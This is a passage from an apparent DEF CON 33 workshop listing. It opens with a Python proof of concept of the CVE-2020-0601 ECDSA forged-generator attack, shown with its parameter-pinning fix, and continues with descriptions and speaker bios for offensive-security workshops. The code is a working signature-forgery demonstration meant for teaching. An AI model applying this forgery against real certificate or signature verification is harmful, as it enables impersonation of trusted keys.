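P = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEFFFFFC2F
A, B = 0, 7
N = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEBAAEDCE6AF48A03BBFD25E8CD0364141
G = (0x79BE667EF9DCBBAC55A06295CE870B07029BFCDB2DCE28D959F2815B16F81798,
     0x483ADA7726A3C4655DA4FBFC0E1108A8FD17B448A68554199C47D08FFB10D4B8)


def on_curve(pt) -> bool:
    if pt is None:                    # point at infinity
        return True
    x, y = pt
    return (y * y - (x * x * x + A * x + B)) % P == 0


def add(p1, p2):
    """Affine point addition; None is the point at infinity."""
    if p1 is None:
        return p2
    if p2 is None:
        return p1
    x1, y1 = p1
    x2, y2 = p2
    if x1 == x2 and (y1 + y2) % P == 0:
        return None
    if p1 == p2:
        lam = (3 * x1 * x1 + A) * pow(2 * y1, -1, P) % P
    else:
        lam = (y2 - y1) * pow(x2 - x1, -1, P) % P
    x3 = (lam * lam - x1 - x2) % P
    return (x3, (lam * (x1 - x3) - y1) % P)


def mul(k: int, pt):
    """Double-and-add scalar multiplication (variable-time; fine for an attack demo)."""
    result, addend = None, pt
    while k:
        if k & 1:
            result = add(result, addend)
        addend = add(addend, addend)
        k >>= 1
    return result


def hash_int(msg: bytes) -> int:
    return int.from_bytes(hashlib.sha256(msg).digest(), "big") % N


def ecdsa_sign(priv: int, gen, msg: bytes):
    """Textbook ECDSA over generator `gen`. The nonce k is derived from the
    message only to keep the demo deterministic; real signers use RFC 6979 or a CSPRNG."""
    z = hash_int(msg)
    k = hash_int(b"k" + msg) or 1
    r = mul(k, gen)[0] % N
    s = pow(k, -1, N) * (z + r * priv) % N
    return (r, s)


def ecdsa_verify(pub, gen, msg: bytes, sig) -> bool:
    r, s = sig
    if not (0 < r < N and 0 < s < N and on_curve(pub) and on_curve(gen)):
        return False
    z = hash_int(msg)
    w = pow(s, -1, N)
    pt = add(mul(z * w % N, gen), mul(r * w % N, pub))
    return pt is not None and pt[0] % N == r


def forge_generator(victim_pub, attacker_priv: int):
    """The CVE-2020-0601 trick: G' = d'^-1 * Q, so d' * G' == Q.
    Whoever accepts (Q, G') as 'the trusted key, on this explicit curve' now
    accepts signatures made with d', which the attacker knows."""
    return mul(pow(attacker_priv, -1, N), victim_pub)


def accept_explicit_params(gen, order: int) -> bool:
    """The fix: compare the whole curve (generator and order here; a real check
    also covers p, a, b and the cofactor) against the named curve you trust,
    never just the public key point."""
    return gen == G and order == N


if __name__ == "__main__":
    d_victim = 0x4C1A2B3C4D5E6F708192A3B4C5D6E7F8091A2B3C4D5E6F708192A3B4C5D6E7F8   # constructed
    Q = mul(d_victim, G)                      # the trusted root's public key
    d_att = 0xBADC0FFEE0DDF00D                # attacker's own private key
    Gf = forge_generator(Q, d_att)
    msg = b"CN=*.example.test, issued by attacker"
    sig = ecdsa_sign(d_att, Gf, msg)
    print("forged params accepted by naive verifier:", ecdsa_verify(Q, Gf, msg, sig))
    print("same signature under the real curve:     ", ecdsa_verify(Q, G, msg, sig))
    print("parameter check rejects G':              ", not accept_explicit_params(Gf, N))
```

The lesson generalises past this one CVE: any place a verifier lets the signer choose algorithm parameters (curve, group, hash, padding) must pin them to a known-good set, because "the public key matches" proves nothing about the arithmetic it will be used in.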

Links:
    Registration (July 15) – https://events.humanitix.com/dc33ws-n255-08a

People:
    SpeakerBio:  Matt Cheung

Matt Cheung started developing his interest in cryptography during an internship in 2011. He worked on the implementation of a secure multi-party protocol by adding elliptic curve support to an existing secure text pattern matching protocol. Implementation weaknesses were not a priority, and this concerned Matt. This concern prompted him to learn about cryptographic attacks from Dan Boneh's Crypto I course offered on Coursera and the Matasano/cryptopals challenges. From this experience he has given workshops at the Boston Application Security Conference, BSidesLV, DEF CON, and the Crypto and Privacy Village. He now serves on the programming committee of the Crypto and Privacy Village.




K8sploitation: Hacking Kubernetes the Fun Way

Workshop Map Page – LVCCNorth-Level2-N255
When:  Saturday, Aug 9, 14:00 – 17:59 PDT

Kubernetes is now at the heart of modern infrastructure, yet offensive security content targeting real-world K8s exploitation is still underrepresented—even at DEF CON. K8sploitation: Hacking Kubernetes the Fun Way fills that gap by diving deep into hands‑on Kubernetes hacking techniques including privilege escalation, lateral movement, and control plane compromise. In this workshop, we set aside the buzzwords and focus on practical attacks and defenses drawn from real adversary tradecraft. Whether you’re a red teamer looking to understand how attackers think or a defender seeking to shore up your cluster’s security, you’ll gain invaluable insights through live demos, guided labs, and lessons learned from enterprise and government security operations. This session bridges cloud‑native technology with hands‑on offensive security training in a way that’s rare, relevant, and overdue.

Links:
    Registration (July 15) – https://events.humanitix.com/dc33ws-n255-09p

People:
    SpeakerBio:  Marcelo Ribeiro, Hewlett Packard Enterprise (HPE)

Marcelo Ribeiro leads the Offensive Security Special Ops team at Hewlett Packard Enterprise (HPE) with 20+ years of cybersecurity experience across HPE, Microsoft, IBM, and the Brazilian Navy. A former Navy Officer, he helped build Brazil’s Naval Cybersecurity capabilities and led IBM’s DFIR practice in Latin America.

At HPE, Marcelo develops advanced offensive security programs, leveraging Kubernetes infrastructure and AI to enhance offensive operations and harden cyber defenses. He has presented at DEF CON 2024 and various security conferences, sharing expertise on red teaming, cloud security, and Kubernetes exploitation.

Recognized in the EC-Council CEH Hall of Fame (2023), Marcelo holds CISSP, CISM, OSCP, GXPN, GPEN, GWAPT, GAWN, GRID, GREM, GCIH, GCIA, and more. Passionate about pushing offensive security boundaries, he thrives on tackling new adversarial challenges in modern cloud environments.

SpeakerBio:  Jeff Jordan, Hewlett Packard Enterprise (HPE)

Jeff Jordan is a Lead Penetration Tester in the Product Security Office with over 13 years of experience at HPE. He began his career in UEFI validation before transitioning into offensive security, where he now leads technical penetration testing efforts across a wide product portfolio. His work focuses on identifying and mitigating security risks through ethical hacking and secure development practices. Jeff has hands-on experience testing Kubernetes-based platforms, including containerized Home Subscriber Server (HSS) products used in 4G infrastructure. He holds CEH and CCSP certifications and plays a key role in driving product security strategy and execution.




Learning to Hack Bluetooth Low Energy with BLE CTF

Workshop Map Page – LVCCNorth-Level2-N252
When:  Saturday, Aug 9, 14:00 – 17:59 PDT

BLE CTF is a series of Bluetooth Low Energy challenges in a capture-the-flag format. It was created to teach the fundamentals of interacting with and hacking Bluetooth Low Energy services. Each exercise, or flag, aims to interactively introduce a new concept to the user.

Over the past few years, BLE CTF has expanded to support multiple platforms and skill levels. Various books, workshops, training, and conferences have utilized it as an educational platform and CTF. As an open source, low-cost of entry, and expandable education solution, BLE CTF has helped progress Bluetooth security research.

This workshop will teach the fundamentals of interacting with and hacking Bluetooth Low Energy services. Each exercise, or flag, aims to interactively introduce a new concept to the user. For this workshop, we will undergo a series of exercises to teach beginner students new concepts and allow more seasoned users to try new tools and techniques. After completing this workshop, you should have a solid understanding of how to interact with and hack on BLE devices in the wild.

Links:
    Registration (July 15) – https://events.humanitix.com/dc33ws-n252-09p

People:
    SpeakerBio:  Ryan Holeman

Ryan Holeman resides in Austin, Texas, where he works as the CISO for Stability AI. He is currently pursuing a Ph.D. in cyber defense from Dakota State University. He has spoken at respected venues such as Black Hat, DEF CON, Lockdown, BSides, Ruxcon, Notacon, and Shmoocon. You can keep up with his current activity, open source contributions, and general news on his blog. His spare time is mostly spent digging into various network protocols, random hacking, creating art, and shredding local skateparks.

SpeakerBio:  Alek Amrani

Alek Amrani is bad at expense reports.




Medical Device Hacking: 201

Workshop Map Page – LVCCNorth-Level2-N260
When:  Friday, Aug 8, 09:00 – 12:59 PDT

This hands-on course provides an in-depth exploration of Medical Device Penetration Testing, equipping security professionals with the skills to identify and exploit vulnerabilities in medical technologies. Participants will engage in practical exercises covering device board analysis and attacks, external network threats, bypassing kiosk controls, Windows and Linux post-exploitation techniques, and execution restriction bypasses. By leveraging real-world scenarios, this course ensures a comprehensive understanding of modern security risks and defense strategies in medical environments.

Links:
    Registration (July 15) – https://events.humanitix.com/dc33ws-n260-08a

People:
    SpeakerBio:  Michael “v3ga” Aguilar, Principal Consultant at Sophos Red Team

Michael Aguilar (v3ga) is a Principal Consultant for Sophos Red Team. He leads efforts in Medical Device testing, Adversarial Simulations, Physical Security assessments, Network testing and more. Currently, he has 8 CVEs for security issues found during testing at DEF CON’s Biohacking Village Device Lab. He has also led the winning team of the DEF CON Biohacking Village CTF for two consecutive years.

SpeakerBio:  Alex “cheet” Delifer

A seasoned medical device red team hacker with nearly a decade in the trenches, Alex Delifer (cheet) breaks stuff so others can sleep at night. He operates out of an unnamed medtech company, where he regularly tears through embedded systems, surgical robots, industrial controllers, APIs, and BIOS firmware like it’s target practice. A Biohacking Village Capture the Flag Champion at DEF CON, he’s known in some circles as the medical device testing sledgehammer—swinging hard, finding the flaws others miss, and leaving no UART unturned.




Obfuscation Reloaded: Modern Techniques for Evading Detection

Workshop Map Page – LVCCNorth-Level2-N257
When:  Friday, Aug 8, 14:00 – 17:59 PDT

As defenders evolve with more sophisticated detection strategies, red teamers must innovate to remain effective. This intermediate hands-on workshop delves into modern obfuscation techniques, bypass strategies, and OPSEC considerations that reflect the current threat landscape. Participants will explore how Microsoft’s Antimalware Scan Interface (AMSI), Defender, and Event Tracing for Windows (ETW) are being leveraged by defenders and how to navigate around them.

You’ll walk away with an understanding of the real-world effectiveness of techniques like string encryption, runtime compilation, sandbox evasion, and how minimalistic evasion (“least obfuscation”) helps evade both machine learning and heuristic-based detections. Attendees will use PowerShell, C#, and open-source tooling to build and test evasive payloads in a lab setting.

In this workshop, attendees will:

1. Learn to identify and break static and dynamic detection signatures.
2. Employ least-obfuscation strategies and runtime evasion.
3. Build AMSI and ETW bypasses using up-to-date PowerShell and C# techniques.
4. Understand P/Invoke and API hooking.
5. Evaluate how defenders log and detect activity and design code to stay under the radar.

Links:
    Registration (July 15) – https://events.humanitix.com/dc33ws-n257-08p

People:
    SpeakerBio:  Jake “Hubble” Krasnov, Red Team Operations Lead and Chief Executive Officer at BC Security

Jake “Hubble” Krasnov is the Red Team Operations Lead and Chief Executive Officer of BC Security, with a distinguished career spanning engineering and cybersecurity. A U.S. Air Force veteran, Jake began his career as an Astronautical Engineer, overseeing rocket modifications, leading test and evaluation efforts for the F-22, and conducting red team operations with the 57th Information Aggressors. He later served as a Senior Manager at Boeing Phantom Works, where he focused on aviation and space defense projects. A seasoned speaker and trainer, Jake has presented at conferences including DEF CON, Black Hat, HackRedCon, HackSpaceCon, and HackMiami.

SpeakerBio:  Vincent “Vinnybod” Rose, Confluent

Vincent “Vinnybod” Rose is the Lead Developer for Empire and Starkiller. He is a software engineer with a decade of expertise in building highly scalable cloud services, improving developer operations, and automation. Recently, his focus has been on the reliability and stability of the Empire C2 server. Vinnybod has presented at Black Hat and has taught courses at DEF CON on Red Teaming and Offensive PowerShell. He currently maintains a cybersecurity blog focused on offensive security at https://www.bc-security.org/blog/.

SpeakerBio:  Gannon “Dorf” Gebauer

Gannon “Dorf” Gebauer is a Security Consultant and Tool Developer at BC Security, specializing in threat intelligence, embedded system testing, and automation for range deployments. He has led teams through CyberPatriot, the USAF CTF that challenges participants in both defensive and offensive capabilities. Gannon is also an accomplished speaker and trainer, having delivered talks and training sessions at Black Hat, DEF CON, and Texas Cyber Summit.

SpeakerBio:  Rey “Privesc” Bango, Security Consultant at BC Security

Rey “Privesc” Bango is a Principal Cloud Advocate at Microsoft and a Security Consultant specializing in red teaming at BC Security. At Microsoft, he focuses on empowering organizations to leverage transformative technologies such as Artificial Intelligence and Machine Learning, prioritizing trust, security, and responsible use. He is an experienced trainer and speaker, presenting and teaching at cybersecurity conferences, including Black Hat and DEF CON. His work continues to bridge the gap between cutting-edge technological advancements and the critical need for secure, ethical implementation in today’s world.




Open Source Malware 101 – Everything you always wanted to know about npm malware (and more)

Workshop Map Page – LVCCNorth-Level2-N254
When:  Friday, Aug 8, 09:00 – 12:59 PDT

Software supply chain attacks are out of control! Between 2019 and 2023 software supply chain attacks increased by more than 740% year on year. Things have only gotten worse since then, with attacks like Bybit, Ultralytics, LottieFiles, Polyfills, and of course XZ utils happening in the last 18 months. But how are these supply chain attacks delivered? Often, the attack starts with a malicious npm package.

According to Sonatype, 98.5% of malicious software packages exist in the npm registry. There are several reasons that npm is particularly well suited for delivering malware, and that’s why I chose to focus just on npm for this 4 hour workshop.

This hands-on workshop will teach both software engineers and infosec practitioners how npm malware works. We’ll learn what makes npm malware unique among software package malware, and how the author has been using his knowledge of npm malware in his research and to deliver unique offensive security engagements. Most importantly, this workshop covers how to identify, analyze, create and defend against malicious npm packages.

The trainer for this workshop, Paul McCarty, is literally writing the book on the subject “Hacking npm”, so he will drop lots of in-depth, never before seen npm techniques.

Links:
    Registration (July 15) – https://events.humanitix.com/dc33ws-n254-08a

People:
    SpeakerBio:  Paul “6mile” McCarty, Head of Research at Safety

Paul is the Head of Research at Safety (safetycli.com) and a DevSecOps OG. He loves software supply chain research and delivering supply chain offensive security training and engagements. He’s spent the last two years deep-diving into npm and has made several discoveries about the ecosystem. Paul founded multiple startups starting in the ’90s, with UtahConnect, SecureStack in 2017, and SourceCodeRED in 2023. Paul has worked for NASA, Boeing, Blue Cross/Blue Shield, John Deere, the US military, the Australian government and several startups over the last 30 years.  Paul is a frequent open-source contributor and author of several DevSecOps, software supply chain and threat modelling projects. He’s currently writing a book entitled “Hacking NPM”, and when he’s not doing that, he’s snowboarding with his wife and 3 amazing kids.




Pen-testing Cloud REST APIs

Workshop Map Page – LVCCNorth-Level2-N255
When:  Saturday, Aug 9, 09:00 – 12:59 PDT

This workshop will teach how to start pen testing a cloud REST API. Attendees should have a fundamental knowledge of the OWASP Top 10 and web application security. Attendees will learn how to set up tools (e.g. Burp) and practice on a simulated cloud environment to discover vulnerabilities in cloud REST APIs. This includes attacks on authorization, XSS, and SQL injection. Technologies such as OpenStack, Salesforce, and Google Cloud will be covered.

Links:
    Registration (July 15) – https://events.humanitix.com/dc33ws-n255-09a

People:
    SpeakerBio:  Rodney Beede, Principal Consultant at Coalfire

Rodney is a principal consultant and has specialized in cloud security for over 10 years. He has spoken at multiple conferences on topics from cloud security engineering to IoT device hacking. He has multiple CVEs for discovered web application security vulnerabilities. He started his career in enterprise web application software development but shifted to the security industry with his master’s thesis research project “A Framework for Benevolent Computer Worms” (2012). Website: https://www.rodneybeede.com




PLC Playground: Hands-On Industrial Control Systems Attacks

Workshop Map Page – LVCCNorth-Level2-N254
When:  Friday, Aug 8, 14:00 – 17:59 PDT

Ever wanted to tinker with a real industrial controller without risking a plant meltdown? In this workshop, you’ll get to play in a PLC playground using actual industrial control hardware like the MicroLogix 1100 PLC that simulates physical processes like a fluid tank and a garage door. Guided by ladder logic programming and Proportional Integral Derivative (PID) tuning exercises, you will program the PLC to maintain tank levels and move machines, observing how the control system responds in real-time.

This workshop focuses on directly interacting with and exploiting the physical PLC hardware and its underlying protocols with a hardware-in-the-loop setup that includes an HMI. Participants won’t just click buttons. They’ll write ladder logic, interact with real I/O, and observe how PLCs process and respond to industrial inputs in real-time. Along the way, we’ll highlight common ICS quirks and vulnerabilities (from insecure protocols to “insecure by design” logic) that can make these systems a hacker’s playground. The Hardware In the Loop Industrial Control System (HILICS) kits used in this workshop are an open-source project that was designed and built by the Air Force Institute of Technology (AFIT) to provide a safe, scalable platform for exploring the cyber-physical dynamics of ICS environments.

Links:
    Registration (July 15) – https://events.humanitix.com/dc33ws-n254-08p

People:
    SpeakerBio:  Anthony “Coin” Rose, Director of Security Research and Chief Operating Officer at BC Security

Dr. Anthony “Coin” Rose is the Director of Security Research and Chief Operating Officer at BC Security, as well as a professor at the Air Force Institute of Technology, where he serves as an officer in the United States Air Force. His doctorate in Electrical Engineering focused on building cyber defenses using machine learning and graph theory. Anthony specializes in adversary tactic emulation planning, Red and Blue Team operations, and embedded systems security. Anthony has presented at security conferences, including Black Hat, DEF CON, HackMiami, RSA, HackSpaceCon, Texas Cyber Summit, and HackRedCon. He also leads the development of offensive security tools, including Empire and Moriarty.

SpeakerBio:  Daniel Koranek, Air Force Institute of Technology

Dr. Daniel Koranek is an Assistant Professor of Computer Science at the Air Force Institute of Technology (AFIT) and a two-time graduate of AFIT in cyber operations (2010, M.S.) and computer science (2022, Ph.D.), where his research interests focus on the intersection of artificial intelligence/machine learning and cybersecurity. This includes using AI/ML to enhance cybersecurity and using vulnerability assessment and secure design techniques to improve AI deployments. He has spent most of his career on reverse engineering and vulnerability assessment of embedded systems like the HILICS kit, and overlapping AI and cybersecurity drove Dr. Koranek’s dissertation research on using the reverse engineering tool Binary Ninja to visualize explanations of malware classifications.

SpeakerBio:  Tyler Bertles

Tyler Bertles is a Captain in the United States Army, currently pursuing a Master’s degree in Cyber Operations at the Air Force Institute of Technology. He holds a Bachelor’s degree in Computer Science and has conducted prior research on automated flight systems, with a focus on quadcopter platforms. With over 10 years of experience in Army Aviation, he has worked extensively with satellite navigation and communication systems. His current thesis research centers on developing intrusion detection capabilities for satellite cybersecurity.

SpeakerBio:  César Ramirez 

Captain César Ramirez is a student in the Cyber Operations Master’s Program at the Air Force Institute of Technology (AFIT). He has a strong interest in penetration testing and digital forensics, which is reflected in his current research on attribution through proxy chains and the use of Explainable Artificial Intelligence (XAI) to identify malware functionality within blue networks. He has supported defensive cyber operations for space systems and intelligence-sharing platforms. In addition, he brings unique expertise in the application of non-kinetic effects to degrade the performance and functionality of military-grade drones. Captain Ramirez holds multiple certifications, including Security+, Pentest+, and Certified Cloud Security Professional (CCSP).




Practical YARA: Crafting Custom Rules for Targeted Malware Defense

Workshop Map Page – LVCCNorth-Level2-N257
When:  Saturday, Aug 9, 09:00 – 12:59 PDT

Threat actors skillfully evade automated defenses. Countering them requires more than tools; it demands human insight and the art of precise detection. In Practical YARA: Crafting Custom Rules for Targeted Malware Defense, you’ll move beyond generic signatures and learn the craft of building truly effective YARA rules. This workshop focuses on translating nuanced understanding gained from malware analysis and threat intelligence into powerful, human-authored detections. Through fast-paced, hands-on labs covering static and behavioral analysis, you will master the art of identifying unique malicious characteristics and expressing them efficiently in YARA. Learn to build high-fidelity rules that supercharge threat hunting, pinpoint emerging threats, and give you confident control—skills essential in an era where quality hand-crafted detection logic provides a critical edge. Leave ready to bolster your defensive arsenal with expertise, not just automation.

Links:
    Registration (July 15) – https://events.humanitix.com/dc33ws-n257-09a

People:
    SpeakerBio:  Joshua “jstrosch” Stroschein, Google

Joshua is an experienced malware analyst and reverse engineer and has a passion for sharing his knowledge with others. He is a reverse engineer with the FLARE team at Google, where he focuses on tackling the latest threats. He is an accomplished trainer, providing training at places such as Ring Zero, Black Hat, DEF CON, ToorCon, Hack In The Box, SuriCon, and other public and private venues. He is also an author on Pluralsight, where he publishes content around malware analysis, reverse engineering, and other security related topics.

SpeakerBio:  Francisco Perdomo, Google

Francisco is a skilled security professional with a strong background in detection engineering and threat intelligence. With extensive blue team experience, he currently works as a Security Engineer at Google’s VirusTotal Research team, where he leverages his operational expertise to investigate malware trends and create insightful technical content. Francisco’s background includes roles as a SecOps Engineer, and Professor of Computer Security.

SpeakerBio:  Jae Young Kim, Google

Jae Young Kim is a Senior Reverse Engineer on Mandiant’s FLARE Team where he reverses malware and contributes to FLARE’s automated analysis and binary similarity efforts. He is a seasoned instructor and a core contributor to FLARE’s educational content development efforts. He has a Bachelor’s in Computer Science from Columbia University.




Provably exfiltrating data by breaking TLS in the right ways

Workshop Map Page – LVCCNorth-Level2-N253
When:  Sunday, Aug 10, 09:00 – 12:59 PDT

Join our hands-on workshop to master TLSNotary! Dive into multi-party-TLS (not man-in-the-middle) and learn to prove and verify online data authenticity to a third-party verifier while ensuring privacy. We’ll start with small examples and build up to custom plugins to prove and verify private user data.

Bring your laptop, bring a friend, and learn together. Get ready to unlock and compose web data in innovative ways.

Links:
    Registration (July 15) – https://events.humanitix.com/dc33ws-n253-10a

People:
    SpeakerBio:  AtHeartEngineer, Head of Engineering at Privacy and Scaling Explorations

AtHeartEngineer has been building and breaking things since the 90s, nearly setting his parents’ garage on fire while learning about mains voltage. He previously led engineering at Privacy and Scaling Explorations, a non-profit focused on building privacy-preserving technologies using programmable cryptography tools like zero-knowledge proofs, and is now exploring what is next.

SpeakerBio:  Sinu, Technical Lead of TLSNotary at Privacy and Scaling Explorations

Sinu is a neutral systems maxi, a cryptography engineer, and the technical lead of TLSNotary.




Putting EDRs in Their Place: Killing and Silencing EDR Agents

Workshop Map Page – LVCCNorth-Level2-N253
When:  Saturday, Aug 9, 14:00 – 17:59 PDT

Many cybercrime and APT actors kill and/or silence EDR agents in order to evade detection, allowing them to achieve their actions on objectives without notifying security teams. How do they do it? What tools do they use? How do they write those tools? What is BYOVD? If you’re interested in learning how adversaries bypass EDR platforms, this workshop is for YOU!

Every student who attends this workshop will have a personal lab environment generated for them. Using the online lab environment, students will review a live EDR tool in order to become familiar with its capabilities, logging, and more. Students will then compile and run an EDR killer used commonly by major threat groups. Next, students will execute commands to silence agent-to-tenant communication, thereby negating notification to security teams.

Following the building, use, and analysis of readily available tools, students will learn how to write their own code to achieve similar means. We will be using a combination of pre-provided code snippets and code we write in real time in order to both kill and silence the provided EDR agent. Are you ready to take your reverse engineering and coding skills to the next level? – Let’s do this! And remember: #RansomwareSucks!

Links:
    Registration (July 15) – https://events.humanitix.com/dc33ws-n253-09p

People:
    SpeakerBio:  Ryan “rj_chap” Chapman, Author & Instructor at SANS Institute

Ryan Chapman is the author of SANS’ “FOR528: Ransomware and Cyber Extortion” course, teaches SANS’ “FOR610: Reverse Engineering Malware” course, works as a threat hunter @ $dayJob, and is an author for Pluralsight. Ryan has a passion for life-long learning, loves to teach people about ransomware-related attacks, and enjoys pulling apart malware. He has presented workshops at DefCon and other conferences in the past and knows how to create a step-by-step instruction set to maximize hands-on learning.

SpeakerBio:  Aaron “ironcat” Rosenmund, Managing Director of Tradecraft and Programs at OnDefend

Aaron Rosenmund is an accomplished cybersecurity professional with extensive experience in various leadership roles across multiple organizations. Currently serving as the Managing Director of Tradecraft and Programs at OnDefend since September 2024, Aaron also holds a position at the National Guard Bureau as Staff Lead for the Cyber Shield Red Team, demonstrating a commitment to enhancing cybersecurity defenses. With a background that includes significant roles at Pluralsight, where responsibilities spanned content strategy and security skills development, and the Florida Air National Guard as a Lead Cyber Operator focused on defensive operations, Aaron has developed a comprehensive skill set in threat emulation, cyber system operations, and training. Additionally, past leadership positions as CEO at Aestus Industries and Vice President at Concrete Surface Innovations underscore strong management capabilities and operational expertise. Aaron holds multiple degrees in technology and cybersecurity from respected institutions, underscoring a solid educational foundation in this field.




Reach the Nirvana

Workshop Map Page – LVCCNorth-Level2-N258
When:  Saturday, Aug 9, 09:00 – 12:59 PDT

Nirvana debugging is a Windows internal feature that has existed since Windows 7. The idea of this workshop is to see how this feature can be weaponized in order to:

  • Hijack execution flow
  • Perform process injection
  • Perform sleep obfuscation for a C2 beacon

During this workshop, you will learn the main principles of Nirvana debugging and try to weaponize it. Some debugging, reverse engineering and coding will be needed in order to create new malware that will evade classic EDR solutions.

WHILE THIS IS AN INTRODUCTION TO NIRVANA HOOKING, THIS WORKSHOP IS STILL A HIGHLY TECHNICAL WORKSHOP

Links:
    Registration (July 15) – https://events.humanitix.com/dc33ws-n258-09a

People:
SpeakerBio:  Yoann “OtterHacker” DEQUEKER, RedTeam Leader at Wavestone

Yoann Dequeker (@OtterHacker) is a red team operator at Wavestone holding OSCP and CRTO certifications. Aside from his red team engagements and his contributions to public projects such as Impacket, he spends time working on malware development to ease beacon deployment and EDR bypass during engagements and is currently developing a fully custom C2.

His research has led him to present his results at several conferences such as LeHack (Paris), Insomni’hack, BlackAlps (Switzerland), and through 4-hour malware workshops at DEF CON 31 and DEF CON 32 (Las Vegas). Throughout the year, he publishes white papers on the techniques he discovered or upgraded and the vulnerabilities he found in public products.




SnowGoat: Exposing Hidden Security Risks and Leaking Data Like a Threat Actor

Workshop Map Page – LVCCNorth-Level2-N258
When:  Friday, Aug 8, 09:00 – 12:59 PDT

Join us for an engaging and interactive workshop where we delve into the hidden risks within your configurations in Snowflake. This intermediate-level session is designed to provide hands-on experience with vulnerable and misconfigured environments, utilizing plug-and-play Terraform scripts and your free-tier Snowflake and AWS accounts. Attendees will explore the UNC5337 data-theft and extortion campaign, and other common Snowflake misconfigurations and risks through a fun and interactive “Capture The Flag” (CTF) style attack scenario, with the main objective of leaking sensitive data from Snowflake.

Key Topics:

  • Snowflake as a data-lake service and common security pitfalls.
  • UNC5337 Data-Theft and Extortion Campaign: gain insights into real-world cyber threats and how they operate.
  • Solve problems and bypass misconfigured security mechanisms.
  • Learn about data-related risks that could lead to a data breach.

Technical Level: Intermediate

Learning Outcomes: By the end of this workshop, attendees will:

  • Understand best practices for securing configurations in Snowflake.
  • Gain practical experience in identifying and mitigating unsecured configurations.
  • Gain knowledge to handle real-world cyber threats effectively.

Links:
    Registration (July 15) – https://events.humanitix.com/dc33ws-n258-08a

People:
    SpeakerBio:  Lior Adar, Cloud Security Researcher at Varonis

Lior is a senior security researcher at Varonis and a passionate security enthusiast with a broad background in red team operations, penetration testing, incident response, and advanced security research. With experience at Palo Alto Networks and Team8, Lior has enhanced his expertise in cybersecurity research across multiple domains, including various cloud providers and SaaS platforms. Known for contributing to the LOLBAS project, he specializes in evaluating emerging threats and analyzing data signals, combining a hands-on approach with a deep understanding of attacker perspective.

SpeakerBio:  Chen Levy Ben Aroy, Cloud Security Research Team Lead at Varonis

Chen Levy Ben Aroy is a distinguished cybersecurity leader with a proven track record in cloud security, penetration testing, and red teaming. As a Cloud Security Research Team Lead at Varonis, Chen spearheads cutting-edge security research and innovation across multiple cloud providers and platforms. His previous roles at well-known enterprises, such as Porsche Digital and AB InBev, showcased his expertise in advanced malware development and strategic project management. With a robust background in a wide array of cybersecurity domains, Chen’s visionary approach and technical acumen make him a sought-after expert in the industry.




Whitebox Web Exploit Dev (WWED)

Workshop Map Page – LVCCNorth-Level2-N252
When:  Friday, Aug 8, 09:00 – 12:59 PDT

WWED is designed for students to gain experience exploiting real-world web applications and take their assessment skills to the next level. Students will learn advanced vulnerability discovery techniques to identify and exploit vulnerabilities in real-world web applications, getting hands-on experience using free and widely available Linux utilities to observe application behavior and so discover and exploit application vulnerabilities more effectively. Using a whitebox approach, students will rapidly discover and exploit non-trivial bugs, without expensive commercial tools or the guesswork that comes along with blackbox testing.

Students will be provided virtual machines of commercially available software applications, which will be used for this heavily lab-focused course. At the conclusion of the class each student will have developed a fully functional remote root PoC. This course targets a wide range of skill levels and will leverage a hints system to help students who may fall behind, incrementally releasing solutions through each exercise.

Links:
    Registration (July 15) – https://events.humanitix.com/dc33ws-n252-08a

People:
    SpeakerBio:  Cale “calebot” Smith

Cale Smith is a nerd who loves both building but also breaking, so he can get better at building. He is passionate about understanding how anything and everything works, improving security along the way is just a bonus. Also, he is passionate about sharing his passion and created this course to pass along some of the more accessible techniques he has picked up. His professional career originated exclusively as a builder, but has been focusing on the security and breaking side for the last 15 years. During that time he has dabbled in the web weenie life, cloud, binary, IoT and mobile most recently. Currently he manages a device oriented AppSec team at Amazon. While AFK he is probably riding a bike or climbing rocks.

SpeakerBio:  Luke Cycon

Security engineer by day, barbecue hacker by night—celebrating each fixed bug with a bit too much somaek. Off the clock, you’ll find him tinkering with hardware or firing lasers at something.

SpeakerBio:  Young Seuk Kim

Husband, father, hacker, gamer. Young’s path into security started like a good game exploit—he wanted to win, bent the rules, and discovered a passion for hacking. He began as a web app security consultant, moved into penetration testing and red teaming, and now works in application security engineering, helping teams build secure systems (and still breaking things for fun). He also dives into all kinds of games and stories, especially fantasy with Eastern martial arts, and loves dissecting media with the same curiosity he brings to code.

SpeakerBio:  Priyanka Joshi

Priyanka sustained her academic voyage using curiosity as her paddles before landing her first job as a software security engineer in an ancient company. For three years thereafter, she focused on research, development and security testing of OAuth2.0 and OpenID implementations. This experience led to her discovery of her passion in the identity space. In her current appsec engineer adventure at Amazon, she enjoys working on secure design assessments, bug bounty triage and fix validation, consults and security testing of web services. In her leisure, she enjoys hiking, lazy gymming, sketching, singing, watching anime and reading manga.




Wi-Fi-So-Serious

Workshop Map Page – LVCCNorth-Level2-N256
When:  Saturday, Aug 9, 09:00 – 12:59 PDT

In Wi-Fi-So-Serious, we will explore setting up and troubleshooting an 802.11 (Wi-Fi) assessment rig. Then, we will look at passive reconnaissance and cracking different Wi-Fi security protocols. Using the Kali Linux VM, we will set up our 802.11 cards in monitor mode and configure them to collect PCAPs. Participants will be taught the methodology and commands needed to troubleshoot wireless cards in Linux. We will work with command line tools like iw, iwconfig, hostapd, wpa_cli, and wpa_supplicant, along with others. Next, the course challenges participants to perform passive collections and work with Wireshark display filters. The course then covers cracking common 802.11 security protocols with Aircrack-ng, Wifite, Airgeddon, Reaver, and Wacker. The Wi-Fi-So-Serious workshop concludes with a Capture The Flag (CTF) so that participants can apply the course content with hands on keyboard. Participants will also learn how to set up a lab they can take home with them.

Links:
    Registration (July 15) – https://events.humanitix.com/dc33ws-n256-09a

People:
    SpeakerBio:  James Hawk, Principal Consultant at GPS

James Hawk (He/Him) is a Principal Consultant with Google Public Sector within Proactive Services. He is the wireless subject matter expert for his team. James has led and contributed to numerous assessments (Red Teams and Pen Tests). He has developed internal training and tool updates for 802.11 for his company. James is a 20-year veteran of the U.S. Army and has over 10 years of hands-on experience in wireless technologies. James is constantly researching/testing 802.11 attacks against his home lab. He is a fan of hockey, LetterKenny, and almost anything sci-fi.

SpeakerBio:  Brian Burnett, Founder of Offensive Technical Solutions

